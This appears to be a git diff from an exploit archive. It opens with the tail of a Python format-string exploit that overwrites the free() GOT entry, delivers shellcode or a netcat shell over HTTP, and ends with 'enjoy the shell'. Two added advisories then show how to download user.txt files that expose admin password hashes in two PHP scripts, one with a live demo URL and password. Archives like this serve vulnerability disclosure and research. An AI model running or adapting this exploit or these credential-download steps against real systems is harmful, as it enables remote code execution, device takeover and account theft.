FMScode.AddWRITEn(1) + + # Write SecondWhere for 'SecondWhat' + # + # This is special POP with 1 byte, we can maximum POP 2! + # + # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement + # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. + # Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x + # + if POP2 != 0: + # We only want to write 'SecondWhat' two bytes higher at free() GOT + if POP2 > 2: + print "POP2 can't be greater than two!" + sys.exit(1) + if POP2 == 1: + FMScode.Add("%2c") + else: + FMScode.Add("%1c%1c") + else: + FMScode.Add("XX") + FMScode.AddWRITEn(1) + + # Write FirstWhat pointed by FirstWhere + FMScode.AddPOP(POP3) # Old Style POP's + FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. + FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB) + + # Write SecondWhat pointed by SecondWhere + FMScode.AddPOP(POP4) # Old Style POP's + FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) + FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation + + else: + sys.exit(1) + + FMSdata = FMScode.FMSbuild() + + print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata)) + + # FMS comes here, and calculations start after '=' in the url + try: + if NCSH1 or NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode + except urllib2.HTTPError as e: + print "[!] Payload delivery failed:",str(e) + sys.exit(1) + except Exception as e: + # 1st string returned by HTTP mode, 2nd by HTTPS mode + if str(e) == "timed out" or str(e) == "('The read operation timed out',)": + print "[i] Timeout! Payload delivered sucessfully!" + else: + print "[!] Payload delivery failed:",str(e) + sys.exit(1) + + if noexploit: + print "\n[*] Not exploiting, no shell...\n" + else: + print "\n[*] All done, enjoy the shell...\n" + +# +# [EOF] +# diff --git a/platforms/php/webapps/40126.txt b/platforms/php/webapps/40126.txt new file mode 100755 index 000000000..0629a68c8 --- /dev/null +++ b/platforms/php/webapps/40126.txt @@ -0,0 +1,13 @@ +# Exploit Title: Free News Script User Password Download File +# Date: 2016-07-18 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns +# Version: All Version +# Download Link : http://www.newsp.eu/newsp.zip + +Exploit : +http://site/admin/user.txt +Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1| + +Username = Admin +Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5] diff --git a/platforms/php/webapps/40127.txt b/platforms/php/webapps/40127.txt new file mode 100755 index 000000000..cb131d761 --- /dev/null +++ b/platforms/php/webapps/40127.txt @@ -0,0 +1,16 @@ +# Exploit Title: PHP calendar script Password Download File +# Date: 2016-07-18 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st +# Version: All Version +# Download Link : http://www.newsp.eu/calendar.zip + +Exploit : +http://site/user.txt +Admin|fe01ce2a7fbac8fafaed7c982a04e229 +Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5] + +Test : +Exploit : http://www.newsp.eu/demo/user.txt +Login Url : http://www.newsp.eu/demo/login.php +Password : demo